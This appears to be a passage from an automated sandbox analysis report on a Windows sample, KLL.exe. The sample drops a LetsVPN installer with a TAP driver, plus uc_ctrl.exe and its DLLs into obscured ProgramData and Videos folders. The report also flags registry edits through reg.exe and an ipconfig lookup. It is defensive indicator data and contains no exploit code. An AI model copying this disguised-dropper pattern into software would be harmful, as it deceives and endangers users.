Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC8B0A push ebx; ret	19_2_6CDC8B0D
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC8B06 push es; ret	19_2_6CDC8B09
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1A5C pushad ; ret	19_2_6CDC1A5D
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1A54 push eax; ret	19_2_6CDC1A59
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1A40 pushad ; retn 0001h	19_2_6CDC1A41
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1A6C pushad ; ret	19_2_6CDC1A5D
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDFB6B8 push ecx; ret	19_2_6CDFB6CB

Source: e_sqlite3.dll.21.dr

Static PE information: section name: .text entropy: 7.128615396301837

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\letsvpn-latest.exe

File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.MemoryMappedFiles.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\WpfAnimatedGif.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.nativelibrary.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Analytics.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Buffers.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-arm\native\e_sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Thread.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.batteries_v2.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.NetTcp.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\LetsPRO.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Syndication.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Drawing.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.MsDelta.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Odbc.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\it\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\de\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ru\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.IPNetwork.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\x64\WebView2Loader.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Parallel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceProcess.ServiceController.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\tr\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ja\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.Common.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Pkcs.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Timer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\pt-BR\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File created: C:\Users\user\Videos\A2A20C2D~m8\msvcp140.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.WinForms.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Wpf.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\arm64\WebView2Loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\vcruntime140.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Security.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Packaging.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.SecureString.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ru\LetsPRO.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	File created: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\fr\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Security.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Console.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\WebSocket4Net.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC54B.tmp	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Rocks.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Squirrel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Writer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.EventLog.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Handles.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ObjectModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.ProtectedData.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensionsAsync.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Web.Services.Description.dll	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\tap0901.sys (copy)	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ICSharpCode.AvalonEdit.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.Reader.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Csp.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Windows.Interactivity.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x64\native\e_sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\letsvpn-latest.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File created: C:\Users\user\Videos\A2A20C2D~m8\vcruntime140.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Http.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-Hans\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Crashes.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\cs\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\ndp462-web.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\PusherClient.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Ping.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ValueTuple.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Drawing.Common.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Utils.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Bcl.AsyncInterfaces.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-TW\LetsPRO.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsExec.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x86\native\e_sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\x86\WebView2Loader.dll	Jump to dropped file
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File created: C:\Users\user\Videos\A2A20C2D~m8\Fqczh.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\es\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Numerics.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\Update.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.AppContext.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\zh-SG\LetsPRO.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Ports.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\microsoft.identitymodel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\WindowsInput.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Primitives.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.SystemEvents.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Sockets.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Permissions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.CodeDom.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KLL.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\msvcp140.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.SqlClient.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Memory.dll	Jump to dropped file
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	File created: C:\Users\user\Videos\A2A20C2D~m8\uc_guilib.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\uninst.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\NuGet.Squirrel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\pl\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Reflection.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ServiceModel.Duplex.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\ko\System.Web.Services.Description.resources.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Queryable.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Resources.ResourceManager.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Data.OleDb.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Overlapped.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.core.dll	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	File created: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC422.tmp	Jump to dropped file
